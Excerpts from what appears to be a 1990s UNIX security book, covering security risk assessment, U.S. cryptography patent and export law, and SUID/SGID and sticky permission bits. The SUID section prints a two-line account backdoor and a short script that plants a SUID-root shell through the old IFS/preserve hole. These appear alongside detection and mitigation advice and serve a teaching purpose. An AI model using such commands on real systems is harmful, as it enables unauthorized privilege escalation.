Cost-Benefit Examples

For example, suppose you have a 0.5% chance of a single power outage lasting more than a few seconds in any given year. The expected loss as a result of personnel not being able to work is $25,000, and the cost of recovery (handling reboots and disk checks) is expected to be another $10,000 in downtime and personnel costs. Thus, the expected loss and recovery cost per year is (25000 + 10000) x .005 = $175. If the cost of a UPS system that can handle all your needs is $150,000 and it has an expected lifetime of ten years, then the cost of avoidance is $15,000 per year. Clearly, investing in a UPS system at this location is not cost-effective.

As another example, suppose that compromise of a password by any employee could result in an outsider gaining access to trade secret information worth $1,000,000. There is no recovery possible, because the trade secret status would be compromised, and once lost it cannot be regained. You have 50 employees who access your network while traveling, and the probability of any one of them accidentally disclosing the password (for example, having it "sniffed" over the Internet; see Chapter 8, Defending Your Accounts) is 2%. Thus, the probability of at least one password being disclosed during the year is 63.6%.[4] The expected loss is (1000000 + 0) x .636 = $636,000. If the cost of avoidance is buying a $75 one-time password card for each user (see Chapter 8), plus a $20,000 software cost, and the system is good for five years, then the avoidance cost is (50 x 75 + 20000) / 5 = $4,750 per year. Buying such a system would clearly be indicated.

[4] That is, 1 - (1.0 - 0.02)^50.
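If you want to double-check arithmetic like this, the standard bc calculator is a convenient tool; the following is only a sketch of the two computations above:

% echo '(25000 + 10000) * .005' | bc -l        # prints 175.000
% echo '1 - .98^50' | bc -l                    # prints .63583..., i.e., about 63.6%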

2.3.3 Adding Up the Numbers

At the conclusion of this exercise, you should have a multi-dimensional matrix consisting of assets, risks, and possible losses. For each loss, you should know its probability, the predicted loss, and the amount of money required to defend against the loss. If you are very precise, you will also have a probability that your defense will prove inadequate.

The process of determining whether each defense should or should not be employed is now straightforward. You do this by multiplying each expected loss by the probability of its occurring as a result of each threat. Sort these in descending order, and compare each cost of occurrence to its cost of defense.

This comparison results in a prioritized list of things you should address. The list may be surprising. Your goal should be to avoid expensive, probable losses before worrying about less likely, low-damage threats. In many environments, fire and the loss of key personnel are much more likely to occur, and are more damaging, than a virus or a break-in over the network. Surprisingly, however, it is break-ins and viruses that seem to occupy the attention and budget of most managers. This practice is simply not cost effective, nor does it provide the highest levels of trust in your overall system.

To figure out what you should do, take the figures that you have gathered for avoidance and recovery and determine how best to address your high-priority items. The way to do this is to add the cost of recovery to the expected average loss, and multiply that by the probability of occurrence. Then, compare the final product with the yearly cost of avoidance. If the cost of avoidance is lower than the risk you are defending against, you would be advised to invest in the avoidance strategy, if you have sufficient financial resources. If the cost of avoidance is higher than the risk that you are defending against, then consider doing nothing until after other threats have been dealt with.[5]

[5] Alternatively, you may wish to reconsider your costs.
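One informal way to keep such a matrix is a plain text file and a short filter; the following sketch is not from this book's checklists, and the file format and figures in it are invented purely to illustrate the "multiply, sort, and compare" step described above:

% cat risks      # columns: threat, probability, loss+recovery ($), yearly avoidance cost ($)
power-outage   0.005   35000    15000
password-leak  0.636   1000000  4750
fire           0.01    2000000  30000
% awk '{ printf "%12.0f %12.0f  %s\n", $2*$3, $4, $1 }' risks | sort -rn
      636000         4750  password-leak
       20000        30000  fire
         175        15000  power-outage

Reading across each line, the first number is the expected annual loss and the second is the yearly cost of avoidance; a defense is worth buying when the first number exceeds the second.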

Risk Cannot Be Eliminated

You can identify and reduce risks, but you can never eliminate risk entirely.

For example, you may purchase a UPS to reduce the risk of a power failure damaging your data. But the UPS may fail when you need it. The power interruption may outlast your battery capacity. The cleaning crew may have unplugged it last week to use the outlet for their floor polisher.

A careful risk assessment will identify these secondary risks and help you to plan for them as well. You might, for instance, purchase a second UPS. But, of course, both of those units could fail at the same time. There might even be an interaction between the two units that you did not foresee when you installed them. The likelihood of a power failure gets smaller and smaller as you buy more backup power supplies and test the system, but it never becomes zero.

Risk assessment can help you to protect yourself and your organization against human risks as well as natural ones. For example, you can use risk assessment to help protect yourself against computer break-ins, by identifying the risks and planning accordingly. But, as with power failures, you cannot completely eliminate the chance of someone breaking into your computer.

This fact is fundamental to computer security: no matter how secure you make a computer, it can always be broken into given sufficient resources, time, motivation, and money.

Even systems that are certified according to the Department of Defense's "Orange Book" are vulnerable to break-ins. One reason is that these systems are sometimes not administered correctly. Another reason is that some people using them may be willing to take bribes to violate the security. Computer access controls do no good if they're not administered properly, exactly as the lock on a building will do no good if it is the night watchman who is stealing office equipment at 2 a.m.

Indeed, people are often the weakest link in a security system. The most secure computer system in the world is wide open if the system administrator cooperates with those who wish to break into the machine. People can be compromised with money, threats, or ideological appeals. People can also make mistakes - like accidentally sending email containing account passwords to the wrong person.

Indeed, people are usually cheaper and easier to compromise than advanced technological safeguards.

2.3.4 Convincing Management

Security is not free. The more elaborate your security measures become, the more expensive they become. Systems that are more secure may also be more difficult to use, although this need not always be the case.[6] Security can also get in the way of "power users," who wish to perform many difficult and sometimes dangerous operations without authentication or accountability. Some of these power users can be politically powerful within your organization.

[6] The converse is also not true: PC operating systems are not secure, even though some are difficult to use.

After you have completed your risk assessment and cost-benefit analysis, you will need to convince your organization's management of the need to act upon the information. Normally, you would formulate a policy that is then officially adopted. Frequently, this process is an uphill battle. Fortunately, it does not have to be.

The goal of risk assessment and cost-benefit analysis is to prioritize your actions and spending on security. If your business plan is such that you should not have an uninsured risk of more than $10,000 per year, you can use your risk analysis to determine what needs to be spent to achieve this goal. Your analysis can also be a guide as to what to do first and what to do second, and can identify which things you should relegate to later years.

Another benefit of risk assessment is that it helps to justify to management that you need additional resources for security. Most managers and directors know little about computers, but they do understand risk and cost/benefit analyses.[7] If you can show that your organization is currently facing an exposure to risk that could total $20,000,000 per year (add up all the expected losses plus recovery costs for what is currently in place), then this estimate might help convince management to fund some additional personnel and resources.

[7] In like manner, few computer security personnel seem to understand risk analysis techniques.

On the other hand, going to management with a vague "We're really likely to see several break-ins on the Internet after the next CERT announcement" is unlikely to produce anything other than mild concern (if that).



Chapter 6. Cryptography

6.7 Encryption and U.S. Law

Encryption is subject to the law in the United States for two reasons: public key cryptography is covered by several U.S. patents, and U.S. law currently classifies cryptography as a munition and, as such, regulates it with export control restrictions.

While these restrictions have hampered the widespread use of cryptography within the United States, they have done little to limit the use of cryptography abroad - one of the putative goals of the export control restrictions.

6.7.1 Cryptography and the U.S. Patent System

Patents applied to computer programs, frequently called software patents, are the subject of ongoing controversy in the computer industry and in parts of Congress. As the number of software patents issued has steadily grown each year, the U.S. Patent and Trademark Office has come under increasing attack for granting too many patents that are apparently neither new nor novel. There is also some underlying uncertainty as to whether patents on software are Constitutional, but no case has yet been tried in an appropriate court to settle the matter definitively.

Some of the earliest and most important software patents granted in the United States were in the field of public key cryptography. In particular, Stanford University was awarded two fundamental patents on the knapsack and Diffie-Hellman encryption systems, and MIT was awarded a patent on the RSA algorithm. Table 6.4 summarizes the various patents that have been awarded on public key cryptography.

Between 1989 and 1995, all of these patents were exclusively licensed to Public Key Partners, a small company based in Redwood City, California. As this book went to press, the partnership was dissolved, and the patents have apparently reverted to the partners, Cylink, Inc., of Sunnyvale, California, and RSA Data Security of Redwood City, California. Exactly what this change in status means for people wishing to practice the inventions has not yet been determined.

6.7.2 Cryptography and Export Controls

Under current U.S. law, cryptography is a munition, akin to nuclear materials and biological warfare agents. Thus, export of cryptographic machines (such as computer programs that implement cryptography) is covered by the Defense Trade Regulations (formerly known as the International Traffic in Arms Regulation, or ITAR). To export a program in machine-readable format that implements cryptography, you need a license from the Office of Defense Trade Controls (DTC) inside the U.S. State Department; publishing the same algorithm in a book or public paper is not controlled.

To get a license to export a program, you disclose the program to the DTC, which then makes an evaluation. (In practice, these decisions are actually made by the National Security Agency.) Historically, programs that implement sufficiently weak cryptography have been allowed to be exported; those with strong cryptography, such as DES, are denied export licenses.

A 1993 survey by the Software Publishers Association, a U.S.-based industry advocacy group, found that encryption is widely available in overseas computer products and that its availability is growing. They noted the existence of more than 250 products distributed overseas containing cryptography. Many of these products use technologies that are patented in the U.S. (At the time, you could literally buy high-quality programs that implement RSA encryption on the streets of Moscow, although Russia has since enacted stringent restrictions on the sale of cryptographic programs.)

Table 6.4: The Public Key Cryptography Patents

Patent 4,200,770, "Cryptographic Apparatus and Method"
    Covers: Diffie-Hellman key exchange
    Inventors: Martin E. Hellman, Bailey W. Diffie, Ralph C. Merkle
    Assignee: Stanford University
    Filed September 6, 1977; granted April 29, 1980; expires April 29, 1997

Patent 4,218,582, "Public Key Cryptographic Apparatus and Method"
    Covers: Knapsack, and possibly all of public key cryptography
    Inventors: Martin E. Hellman, Ralph C. Merkle
    Assignee: Stanford University
    Filed October 6, 1977; granted August 19, 1980; expires August 19, 1997

Patent 4,424,414, "Exponentiation Cryptographic Apparatus and Method"
    Inventors: Martin E. Hellman, Stephen C. Pohlig
    Assignee: Stanford University
    Filed May 1, 1978; granted January 3, 1984; expires January 3, 2001

Patent 4,405,829, "Cryptographic Communications System and Method"
    Covers: RSA encryption
    Inventors: Ronald L. Rivest, Adi Shamir, Leonard M. Adleman
    Assignee: Massachusetts Institute of Technology
    Filed December 14, 1977; granted September 20, 1983; expires September 20, 2000

Most European countries used to have regulations regarding cryptographic software similar to those in force in the U.S. Many were discarded in the early 1990s in favor of a more liberal policy, which allows mass-market software to be freely traded.

In 1992, the Software Publishers Association and the State Department reached an agreement that allows the export of programs containing RSA Data Security's RC2 and RC4 algorithms, but only when the key size is set to 40 bits or less. A 40-bit key is not very secure, and a distributed attack using standard workstations in a good-sized lab can break such a key in at most a few days. This was demonstrated quite visibly in mid-1995, when two independent groups broke 40-bit keys used in the export version of the Netscape browser. Although each effort took many machines and days of work, both were accomplished in fairly standard research environments similar to many others around the world.

Canada is an interesting case in the field of export control. Under current U.S. policy, any cryptographic software can be directly exported to Canada without the need for an export license. Canada has also liberalized its export policy, allowing any Canadian-made cryptographic software to be further exported abroad. But software that is exported to Canada cannot then be exported to a third country, thanks to Canada's Rule #5100, which honors U.S. export prohibitions on "all goods originating in the United States" unless they have been "further processed or manufactured outside the United States so as to result in a substantial change in value, form, or use of the goods or in the production of new goods."

Several companies are now avoiding the hassle of export controls by doing their software engineering overseas and then importing the products back into the United States. We feel that the current regulations serve only to hobble U.S. industry, and play only a minor role in slowing the spread of encryption use worldwide.



Chapter 5. The UNIX Filesystem

5.5 SUID

Sometimes, unprivileged users must be able to accomplish tasks that require privileges. An example is the passwd program, which allows you to change your password. Changing a user's password requires modifying the password field in the /etc/passwd file. However, you should not give a user access to change this file directly - the user could change everybody else's password as well! Likewise, the mail program requires that you be able to insert a message into the mailbox of another user, yet you should not give one user unrestricted access to another's mailbox.

To get around these problems, UNIX allows programs to be endowed with privilege. Processes executing these programs can assume another UID or GID when they're running. A program that changes its UID is called a SUID program (set-UID); a program that changes its GID is called a SGID program (set-GID). A program can be both SUID and SGID at the same time.

When a SUID program is run, its effective UID[22] becomes that of the owner of the file, rather than that of the user who is running it. This concept is so clever that AT&T patented it.[23]

[22] We explained effective UIDs in "Real and Effective UIDs" in Chapter 4, Users, Groups, and the Superuser.

[23] However, the patent has since been released into the public domain - as should all software patents, if software patents should be allowed at all.

5.5.1 SUID, SGID, and Sticky Bits

If a program is SUID or SGID, the output of the ls -l command will have the x in the display changed to an s. If the program is sticky, the last x changes to a t, as shown in Table 5.13 and Figure 5.3.

Figure 5.3: Additional file permissions

Table 5.13: SUID, SGID, and Sticky Bits

Contents     Permission   Meaning

---s------   SUID         A process that execs a SUID program has its effective UID set to be the UID of the program's owner.

------s---   SGID         A process that execs a SGID program has its effective GID changed to the program's GID. Files created by the process can have their primary group set to this GID as well, depending on the permissions of the directory in which the files are created. Under Berkeley-derived UNIX, a process that execs an SGID program also has the program's GID temporarily added to the process's list of GIDs. Solaris and other System V-derived versions of UNIX use the SGID bit on data files to enable mandatory file locking.

---------t   sticky       This is obsolete with files, but is used for directories. See "The Origin of `Sticky'" sidebar later in this chapter.

The Origin of "Sticky"

A very long time ago, UNIX ran on machines with much less memory than today: 64 kilobytes, for instance. This amount of memory was expected to contain a copy of the operating system, I/O buffers, and running programs. This memory often wasn't sufficient when there were several large programs running at the same time.

To make the most of the limited memory, UNIX swapped processes to and from secondary storage as their turns at the CPU ended. When a program was started, UNIX would determine the amount of storage that might ultimately be needed for the program, its stack, and all its data. It then allocated a set of blocks on the swap partition of the disk or drum attached to the system. (Many systems still have a /dev/swap, or a swapper process, that is a holdover from these times.)

Each time the process got a turn from the scheduler, UNIX would swap in the program and data, if needed, execute for a while, and then swap out the memory copy if the space was needed for the next process. When the process exited or exec'd another program, the swap space was reclaimed for use elsewhere. If there was not enough swap space to hold the process's memory image, the user got a "No memory" error (still possible on many versions of UNIX if a large stack or heap is involved).

Obviously, this is a great deal of I/O traffic that could slow computation. So, one of the eventual steps was the development of compiler technology that constructed executable files with two parts: pure code that would not change, and everything else. These were indicated with a special magic number in the header inside the file. When the program was first executed, the program and data were copied to their swap space on disk, then brought into memory to execute. However, when the time came to swap out, the code portions were not written to disk - they would not have changed from what was already on disk! This change was a big savings.

The next obvious step was to stop some of that extra disk-to-disk copying at start-up time. Programs that were run frequently - such as cc, ed, and rogue - could share the same program pages. Furthermore, even if no copy was currently running, another one could be expected to run soon. Therefore, keeping the pages in memory and on the swap partition, even while they weren't being used, made sense. The "sticky bit" was added to mark those programs as worth saving.

Since those times, larger memories and better memory management methods have largely removed the original need for the sticky bit.

In each of the cases above, the designator letter is capitalized if the bit is set and the corresponding execute bit is not set. Thus, a file that has its sticky and SGID bits set, and is otherwise mode 444, would appear in an ls listing as:

% ls -l /tmp/example
-r--r-Sr-T 1 root user 12324 Mar 26 1995 /tmp/example

An example of a SUID program is the su command, introduced in Chapter 4:

% ls -l /bin/su
-rwsr-xr-x 1 root user 16384 Sep 3 1989 /bin/su
%

5.5.2 Problems with SUID

Any program can be SUID, SGID, or both SUID and SGID. Because this feature is so general, SUID/SGID can open up some interesting security problems.

For example, any user can become the superuser simply by running a SUID copy of csh that is owned by root. Fortunately, you must be root already to create a SUID version of csh that is owned by root. Thus, an important objective in running a secure UNIX computer is to ensure that somebody who has superuser privileges will not leave a SUID csh on the system, directly or indirectly.

If you leave your terminal unattended, an unscrupulous passerby can destroy the security of your account simply by typing the commands:

% cp /bin/sh /tmp/break-acct
% chmod 4755 /tmp/break-acct
%

These commands create a SUID version of the sh program. Whenever the attacker runs this program, the attacker becomes you - with full access to all of your files and privileges. The attacker might even copy this SUID program into a hidden directory so that it would be found only if the superuser scanned the entire disk for SUID programs - and not all system administrators do such scanning on any regular basis.

Note that the program copied need not be a shell. Someone with malicious intent can cause you misery by creating a SUID version of other programs. For instance, consider a SUID version of an editor: with it, the attacker can not only read or change any of your files, but also spawn a shell running under your UID.

Most SUID system programs are SUID root; that is, they become the superuser when they're executing. In theory, this aspect is not a security hole, because a compiled program can perform only the function or functions that were compiled into it. (That is, you can change your password with the passwd program, but you cannot alter the program to change somebody else's password.) But many security holes have been discovered by people who figured out ways of making a SUID program do something that it was not designed to do. In many circumstances, programs that are SUID root could easily have been designed to be SUID something else (such as daemon, or some UID created especially for the purpose). Too often, SUID root is used when something with less privilege would be sufficient.

In Chapter 23, Writing Secure SUID and Network Programs, we provide some suggestions on how to write more secure programs in UNIX. If you absolutely must write a SUID or SGID program (and we advise you not to), then consult that chapter first.

5.5.3 SUID Shell Scripts

Under most versions of UNIX, you can create shell scripts[24] that are SUID or SGID. That is, you can create a shell script and, by setting the shell script's owner to be root and setting its SUID bit, you can force the shell script to execute with superuser privileges.

[24] Actually, any interpreted scripts.

You should never write SUID shell scripts.

Because of a fundamental flaw in the UNIX implementation of shell scripts and SUID, you cannot execute SUID shell scripts in a completely secure manner on systems that do not support the /dev/fd device. This flaw arises because executing a shell script under UNIX involves a two-step process: when the kernel determines that a shell script is about to be run, it first starts up a SUID copy of the shell interpreter, and then the shell interpreter begins executing the shell script. Because these two operations are performed in two discrete steps, you can interrupt the kernel after the first step and switch the file that the shell interpreter is about to execute. In this fashion, an attacker can get the computer to execute any shell script of his or her choosing, which essentially gives the attacker superuser privileges. Although this flaw is somewhat mitigated by the /dev/fd device, even on systems that do support a /dev/fd device, SUID shell scripts are very dangerous and should be avoided.

Some modern UNIX systems ignore the SUID and SGID bits on shell scripts for this reason. Unfortunately, many do not.

Instead of writing SUID shell scripts, we suggest that you use the Perl programming language for these kinds of tasks. A version of Perl called taintperl[25] forces you to write SUID scripts that check their PATH environment variable and that do not use values supplied by users for parameters such as filenames unless those values have been explicitly "untainted." Perl has many other advantages for system administration work as well. We describe some of them in Chapter 23. You can also learn more about Perl from the excellent O'Reilly book Programming Perl, by Larry Wall and Randal L. Schwartz.

[25] In release 5 of Perl, this option is replaced by the -T option to Perl.
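For example, on a system with Perl 5 installed, the first line of a privileged administrative script might look like the following; the script name here is hypothetical, the path to perl varies from system to system, and the -T switch enables the same taint checking that taintperl provided:

% head -1 /usr/local/sbin/fixquota
#!/usr/bin/perl -T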

5.5.3.1 write: Example of a possible SUID/SGID security hole

The authors of SUID and SGID programs try to ensure that their software won't create security holes. Sometimes, however, a SUID or SGID program can create a security hole if the program isn't installed in the way the program's author planned.

For example, the write program, which prints a message on another user's terminal, is SGID tty. For security reasons, UNIX doesn't normally let users read or write information to another's terminal; if it did, you could write a program to read another user's keystrokes, capturing any password that she might type. To let the write program function, every user's terminal is set to be writable by the tty group. Because write is SGID tty, the write program lets one user write onto another user's terminal. It first prints a message that tells the recipient the name of the user who is writing onto her terminal.

But write has a potential security hole - its shell escape. By beginning a line with an exclamation mark, the person using the write program can cause arbitrary programs to be run by the shell. (The shell escape is left over from the days before UNIX had job control; it made it possible to run another command while you were engaged in a conversation with a person on the computer using write.) Thus, write must give up its special privileges before it invokes a shell; otherwise, the shell (and any program the user might run) would inherit those privileges as well.

The part of the write program that specifically takes away the tty group permission before the program starts up the shell looks like this:

setgid(getgid());    /* Give up effective group privs */
execl(getenv("SHELL"), "sh", "-c", arg, 0);

Notice that write changes only its GID, not its effective UID. If write is installed SUID root instead of SGID tty, the program will appear to run properly, but any program that the user runs with the shell escape will actually be run as the superuser! An attacker who has broken the security on your system once might change the file permissions of the write program, leaving a hole that he or she could exploit in the future. The program, of course, will still function as before.

5.5.3.2 Another SUID example: IFS and the /usr/lib/preserve hole

Sometimes, an interaction between a SUID program and a system program or library creates a security hole that's unknown to the author of the program. For this reason, it can be extremely difficult to know whether a SUID program contains a security hole or not.

One of the most famous examples of a security hole of this type existed for years in the program called /usr/lib/preserve (which is now given names similar to /usr/lib/ex3.5preserve). This program, which is used by the vi and ex editors, automatically makes a backup of the file being edited if the user is unexpectedly disconnected from the system before writing out changes to the file. The preserve program writes the changes to a temporary file in a special directory, then uses the /bin/mail program to send the user a notification that the file has been saved.

Because people might be editing a file that was private or confidential, the directory used by the older version of the preserve program was not accessible by most users on the system. Therefore, to let the preserve program write into this directory, and to let the recover program read from it, these programs were made SUID root.

Three details of the /usr/lib/preserve implementation worked together to allow knowledgeable system crackers to use the program to gain root privileges:

1. preserve was installed SUID root.

2. preserve ran /bin/mail as the root user to alert users that their files had been preserved.

3. preserve executed the mail program with the system() function call.

The problem was that the system() function uses sh to parse the string that it executes. There is a little-known shell variable called IFS, the internal field separator, which sh uses to figure out where the breaks are between words on each line that it parses. Normally, IFS is set to the white space characters: space, tab, and newline. But by setting IFS to the slash character (/), then running vi, and then issuing the preserve command, it was possible to get /usr/lib/preserve to execute a program in the current directory called bin. This program was executed as root. (/bin/mail got parsed as the command bin with the argument mail.)

If a user can convince the operating system to run a command as root, that user can become root. To see why this is so, imagine a simple shell script which might be called bin, and run through the hole described earlier:[26]

[26] There is actually a small bug in this shell script; can you find it?

#
# Shell script to make an SUID-root shell
#
cd /homes/mydir/bin
cp /bin/sh ./sh
# Now do the damage!
chown root sh
chmod 4755 sh

This shell script would get a copy of the Bourne shell program into the user's bin directory, and then make it SUID root. Indeed, this is the very way that the problem with /usr/lib/preserve was exploited by system crackers.

The preserve program had more privilege than it needed - it violated a basic security principle called least privilege. Least privilege states that a program should have only the privileges it needs to perform the particular function it's supposed to perform, and no others. In this case, instead of being SUID root, /usr/lib/preserve should have been SGID preserve, where preserve would have been a specially created group for this purpose. Although this restriction would not have completely eliminated the security hole, it would have made its presence considerably less dangerous: breaking into the preserve group would only have let the attacker view files that had been preserved.

Although the preserve security hole was a part of UNIX from the time preserve was added to the vi editor, it wasn't widely known until 1986. For a variety of reasons, it wasn't fixed until a year after it was widely publicized.

NOTE: If you are using an older version of UNIX that can't be upgraded, remove the SUID permission from /usr/lib/preserve to patch this security hole.

Newer editions of the UNIX sh ignore IFS if the shell is running as root or if the effective user ID differs from the real user ID. Many other shells have been similarly enhanced, but not all have. That there are still programs being shipped by vendors in 1995 with this same IFS vulnerability inside is interesting and very depressing. The general problem has been known for over 10 years, and people are still making the same (dumb) mistakes.

5.5.4 Finding All of the SUID and SGID Files

You should know the names of all of the SUID and SGID files on your system. If you discover new SUID or SGID files, somebody might have created a trap door that they can use at some future time to gain superuser access. You can list all of the SUID and SGID files on your system with the command:

# find / \( -perm -004000 -o -perm -002000 \) -type f -print

This find command starts in the root directory (/) and looks for all files that match mode 002000 (SGID) or mode 004000 (SUID). The -type f option restricts the search to files. The -print option causes the name of every matching file to be printed.

NOTE: If you are using NFS, you should execute find commands only on your file servers. You should further restrict the find command so that it does not try to search networked disks. Otherwise, use of this command may cause an excessive amount of NFS traffic on your network. To restrict your find command, use the following:

# find / \( -local -o -prune \) \( -perm -004000 -o -perm -002000 \) -type f -print

NOTE: Alternatively, if your find command has the -xdev option, you can use it to prevent find from crossing filesystem boundaries, as sketched below. To search the entire filesystem using this option means running the command multiple times, once for each mounted partition.
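For instance, on a system whose find supports -xdev, the per-partition approach might look like the following; the partition list is site-specific, so adjust it to match your own mount table:

# find /    -xdev \( -perm -004000 -o -perm -002000 \) -type f -print
# find /usr -xdev \( -perm -004000 -o -perm -002000 \) -type f -print
# find /var -xdev \( -perm -004000 -o -perm -002000 \) -type f -print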

Be sure that you are the superuser when you run find, or you may miss SUID files hidden in protected directories.

5.5.4.1 The ncheck command

The ncheck command is an old UNIX command that prints a list of each file on your system and its corresponding inode number. When used with the -s option, ncheck restricts itself to listing all of the "special" inodes on your system - such as the devices and SUID files.

The ncheck command runs on a filesystem-by-filesystem basis. For example:

# ncheck -s | cat -ve -
/dev/dsk/c0t3d0s0:
125 /dev/fd/0
513 /dev/fd/1
514 /dev/fd/2
...
533 /dev/fd/21
534 /dev/fd/22
535 /dev/fd/23
3849 /sbin/su
3850 /sbin/sulogin

(The cat -ve command is present in the above to print control characters so that they will be noticed, and to indicate the end of line for filenames that end in spaces.)

The ncheck command is very old and has largely been superseded by other commands. It may not be present on all versions of UNIX, although it is present in SVR4. If you run it, you may discover that it is substantially faster than the find command, because ncheck reads the inodes directly rather than searching through files in the filesystem. However, ncheck still needs to read some directory information to obtain pathnames, so it may not be that much faster.

Unlike find, ncheck will locate SUID files that are hidden beneath directories used as mount points. In this respect, ncheck is superior to find, which cannot locate such files because they do not have complete pathnames as long as the filesystems are mounted.

You must be superuser to run ncheck.

5.5.5 Turning Off SUID and SGID in Mounted Filesystems

If you mount remote network filesystems on your computer, or if you allow users to mount their own floppy disks or CD-ROMs, you usually do not want programs that are SUID on those filesystems to be SUID on your computer as well. In a network environment, honoring SUID files means that if an attacker manages to take over the remote computer that houses the filesystem, he can also take over your computer, simply by creating a SUID program on the remote filesystem and running the program on your machine. Likewise, if you allow users to mount floppy disks containing SUID files on your computer, they can simply create a floppy disk with a SUID ksh on another computer, mount the floppy disk on your computer, and run the program - making themselves root.

You can turn off the SUID and SGID bits on mounted filesystems by specifying the nosuid option with the mount command. You should always specify this option when you mount a foreign filesystem unless there is an overriding reason to import SUID or SGID files from the filesystem you are mounting. Likewise, if you write a program to mount floppy disks for a user, that program should specify the nosuid option (because the user can easily take his or her floppy disk to another computer and create a SUID file on it).

For example, to mount the filesystem athena from the machine zeus on the directory /usr/athena with the nosuid option, type the command:

# /etc/mount -o nosuid zeus:/athena /usr/athena

Some systems also support a nodev option that causes the system to ignore device files that may be present on the mounted partition. If your system supports this option, you should use it, too. If a user creates a floppy disk with a mode 777 kmem on it, for instance, he can subvert the system with little difficulty if he is able to mount the floppy disk, because UNIX treats the /dev/kmem on the floppy disk the same way that it treats the /dev/kmem on your main system disk - it is a device that maps to your system's kernel memory.
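On systems that accept both options, you can combine them on the same mount command; this is only a sketch in the style of the example above, and the exact option names and mount syntax vary between versions of UNIX:

# /etc/mount -o nosuid,nodev zeus:/athena /usr/athena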

5.5.6 SGID and Sticky Bits on Directories

Although the SGID and sticky bits were originally intended for use only with programs, Berkeley UNIX, SunOS, Solaris, and other operating systems also use these bits to change the behavior of directories, as shown in Table 5.14.

Table 5.14: Behavior of SGID and Sticky Bits with Directories

Bit          Effect

SGID bit     The SGID bit on a directory controls the way that groups are assigned for files created in the directory. If the SGID bit is set, files created in the directory have the same group as the directory if the process creating the file is also in that group. Otherwise, if the SGID bit is not set, or if the process is not in the same group, files created inside the directory have the same group as the user's effective group ID (usually the primary group ID).

Sticky bit   If the sticky bit is set on a directory, files inside the directory may be renamed or removed only by the owner of the file, the owner of the directory, or the superuser (even if the modes of the directory would otherwise allow such an operation); on some systems, any user who can write to a file can also delete it. This feature was added to keep an ordinary user from deleting another's files in the /tmp directory.

For example, to set the mode of the /tmp directory on a system so that any user can create or delete her own files but can't delete another's files, type the command:

# chmod 1777 /tmp
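Similarly, to take advantage of the SGID directory behavior described in Table 5.14 for a shared project directory, you might do something like the following sketch; the directory and group names here are invented for illustration:

# mkdir /usr/local/project
# chgrp staff /usr/local/project
# chmod 2775 /usr/local/project      # SGID directory: files created here by group
                                     # members are given the group "staff" (Table 5.14)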

Many older versions of UNIX (System V prior to Release 4, for instance) do not exhibit either of these behaviors. On those systems, the SGID and sticky bits on directories are ignored by the system. However, on a few of these older systems (including SVR3), setting the SGID bit on a directory resulted in "sticky" behavior.

5.5.7 SGID Bit on Files (System V UNIX Only): Mandatory Record Locking

If the SGID bit is set on a nonexecutable file, AT&T System V UNIX implements mandatory record locking for the file. Normal UNIX record locking is discretionary; processes can modify a locked file simply by ignoring the record-lock status. On System V UNIX, the kernel blocks a process that tries to access a file (or the portion of the file) that is protected with mandatory record locking until the process that has locked the file unlocks it. Mandatory locking is enabled only if none of the execute permission bits are turned on.
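For example, on such a System V system you could mark a data file for mandatory record locking by setting its SGID bit while leaving every execute bit off; a minimal sketch, using the database file from the listing below:

% chmod 2660 database      # set the SGID bit; no execute bits, so locking is mandatory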

Mandatory record locking shows up in an ls listing in the SGID position as a capital "S" instead of a lowercase "s":

% ls -lF data*
-rw-rwS--- 1 fred 2048 Dec 3 1994 database
-r-x--s--x 2 bin 16384 Apr 2 1993 datamaint*



[Chapter 5] 5.9 Oddities and Dubious Ideas<br />

Chapter 5<br />

The <strong>UNIX</strong> Filesystem<br />

5.9 Oddities and Dubious Ideas<br />

In closing, we'll mention two rather unusual ideas in filesystems. This information is provided partly
for completeness, in case one of our readers has such a system, and partly to document some ideas that
we don't think helped security very much. We hope we don't encounter anything like them again any time
soon.

5.9.1 Dual Universes<br />

Throughout this book, you will find that we often mention how the behavior of a command or action may<br />

be different if your version of <strong>UNIX</strong> is derived from BSD or AT&T <strong>UNIX</strong>. These differences are not so<br />

great as they once were, as SVR4 is the result of a merger of the majority of these two lines into one<br />

system.<br />

However, in years gone by, the two systems were separate. This presented an interesting puzzle for some<br />

vendors who wanted to cater to both markets. Thus, someone came up with the idea of universes. The<br />

idea itself was fairly simple. Create a per-process "switch" in memory that would be set to either BSD or<br />

AT&T. The behavior of various system calls might depend on the value of the switch. Furthermore,<br />

certain special directories could be set up so that the directory you'd actually see would depend on the<br />

switch setting. Thus, you could have /usr/bin full of user programs, but it would really be two /usr/bin<br />

directories - one for BSD and one for AT&T!

Several companies adopted variations of the universe concept, including Pyramid, Apollo, Masscomp,

and Sequent. In some of these systems, the switch from one environment to another was almost seamless,<br />

from the user's point of view. However, the scheme had several problems:<br />

●   It took more disk space for a standard configuration. The standard system needed two copies of
    libraries, man pages, commands, and more.

●   In most environments all the users stayed in a single universe. Shops were seldom heterogeneous in
    environment, so users preferred to stay with a familiar interface on everything they did.

●   Patching and maintaining the programs took more than twice the effort, because they required that
    users consider interactions between software in each universe.

●   System administration was often a nightmare. You didn't necessarily know where all your commands
    were; you might need to worry about configuring two different UUCP systems; you couldn't always
    tell which version of a program was spawning jobs; and so on.


Also important to all of this was the problem of security. Often, clever manipulation of interactions<br />

between programs in the two universes could be used to break security. Additionally, a bug discovered in<br />

one universe was often mirrored in the software of the other, but usually only one got fixed (at first).<br />

Eventually, everyone supporting a dual-universe system switched back to a single version of <strong>UNIX</strong>.<br />

Nevertheless, Solaris perpetuates some of these problems. For example, Solaris has two versions of the ls<br />

command, one in /usr/bin/ls, one in /usr/ucb/ls. It also has two versions of head, more, ln, ps, and many<br />

other commands. Thus, you need to check your search path carefully to know which version of a<br />

command you may be using.<br />

5.9.2 Context-Dependent Files<br />

To support diskless workstations, Hewlett-Packard developed a system called Context Dependent Files,
or CDF. CDFs allow multiple configurations to reside on a single computer. The goal of CDFs was
to allow one master server to maintain multiple filesystems that are viewed differently by different
clients. This mechanism thus allows a single server to support a group of heterogeneous clients.

A CDF is basically a hidden directory whose contents are matched against the current context. HP<br />

explains it as follows:[28]<br />

[28] From the HP man page for CDF.<br />

A CDF is implemented as a special kind of directory, marked by a bit in its mode (see<br />

chmod). The name of the CDF is the name of the directory; the contents of the directory are<br />

files with names that are expected to match one part of a process context. When such a<br />

directory is encountered during a pathname search, the names of the files in the directory are<br />

compared with each string in the process's context, in the order in which the strings appear<br />

in the context. The first match is taken to be the desired file. The name of the directory thus<br />

refers to one of the files within it, and the directory itself is normally invisible to the user.<br />

Hence, the directory is called a hidden directory.<br />

When a process with a context that does not match any filenames in the hidden directory<br />

attempts to access a file by the pathname of the hidden directory, the reference is<br />

